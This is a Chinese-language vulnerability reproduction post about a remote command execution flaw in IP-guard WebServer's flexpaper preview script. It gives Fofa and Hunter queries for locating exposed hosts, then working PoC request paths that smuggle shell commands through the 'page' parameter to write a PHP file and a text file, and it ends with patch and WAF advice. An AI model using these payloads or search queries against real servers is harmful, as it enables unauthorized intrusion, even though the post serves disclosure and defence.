【IP-guard WebServer 远程命令执行漏洞复现(0day)】
•
前端
文章目录
- 一、漏洞说明
- 二、影响版本
- 三、资产测绘
- 四、漏洞复现
- 五、修复建议
一、漏洞说明
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-guard Webserver远程命令执行漏洞(RCE)的问题,是因为旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,新版本已不再使用 flexpaper。
二、影响版本
受影响的范围,即有使用文件预览功能的web系统
溢信科技 IP-guard<4.81.0307.0
三、资产测绘
Fofa语法: app="IP-guard" Hunter语法: web.title="IP-guard"
四、漏洞复现
1、来到web访问界面

2、bp抓包修改数据包
poc:
/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+^%3C?php+phpinfo();+?^%3E+%3Esany.php /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+123456+>test.txt

/ipg/static/appr/lib/flexpaper/php/test.txt

可执行写入的命令,可造成重大危害。
五、修复建议
临时防护方案:
1.加强系统和网络的访问控制,修改防火墙策略,不将非必要服务暴露于公网; 2.在公网部署的系统,通过WAF限制外网对"/ipg/static/appr/lib/flexpaper/php/view.php"路径的访问; 3.定期对服务器上的网站后门文件进行及时查杀。
正式防护方案:
官方已修复该漏洞,建议用户更新到安全版本。 安全版本: IP-guard WebServer >= 4.81.0307.0 下载链接: https://www.ip-guard.net/
本文来自网络,不代表协通编程立场,如若转载,请注明出处:https://www.net2asp.com/999312ef06.html
